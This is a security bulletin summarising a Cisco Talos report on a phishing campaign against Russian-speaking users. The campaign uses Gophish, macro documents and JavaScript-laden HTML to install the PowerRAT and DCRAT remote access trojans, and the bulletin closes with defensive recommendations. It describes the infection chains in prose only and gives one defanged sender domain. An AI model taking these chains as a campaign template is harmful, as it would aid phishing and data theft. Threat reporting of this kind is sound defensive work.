Summary:
Cisco Talos recently uncovered a phishing campaign leveraging the open-source Gophish toolkit, executed by an unknown threat actor. The campaign utilizes modular infection chains, either via malicious documents (Maldoc) or HTML files containing JavaScript, which lead to the deployment of two Remote Access Trojans (RATs): PowerRAT, a newly identified PowerShell-based RAT, and DCRAT, a widely recognized malware. Notably, the threat actor appears to be actively developing PowerRAT, as evidenced by placeholders for base64-encoded PowerShell scripts within the malware.

The campaign specifically targets Russian-speaking users, as demonstrated by the use of the Russian language in phishing emails, malicious documents designed to lure victims, and a spoofed webpage mimicking Vkontakte (VK), a popular social media platform in Russia and neighboring countries. Talos found the phishing emails originating from domains like disk-yanbex[.]ru, hosted on AWS infrastructure, which also hosted Gophish and delivered malicious documents and HTML files. The threat actor sent phishing emails from this server, containing links to files that initiate the infection.

The attack follows two main vectors. In Maldoc-based infections, users are tricked into enabling macros in Word documents, which then execute malicious scripts that drop PowerRAT onto the victim's machine. This PowerShell-based RAT hides within the system, performs reconnaissance, and communicates with command-and-control (C2) servers located in Russia. It is capable of executing additional PowerShell commands, opening the door to further infections. HTML-based attacks, on the other hand, use JavaScript to download and install DCRAT, a RAT with capabilities for remote control, data theft, keylogging, and persistence through masquerading as legitimate Windows processes.

Security Officer Comments:
The infrastructure supporting the campaign includes C2 servers based in Russia, with PowerRAT reaching out to these servers for further instructions, while DCRAT retrieves additional payloads from hardcoded GitHub repositories. Despite the campaign's focus on Russian-speaking users, it demonstrates broader implications for how phishing campaigns can evolve with modular, multi-vector approaches.

Suggested Corrections:
This campaign emphasizes the importance of email security, disabling macros by default, and monitoring PowerShell-based activity. Multi-factor authentication and network segmentation should be implemented to reduce the risk of compromise, particularly in organizations with Russian-speaking employees or a presence in the region.


Link(s):
https://blog.talosintelligence.com/gophish-powerrat-dcrat/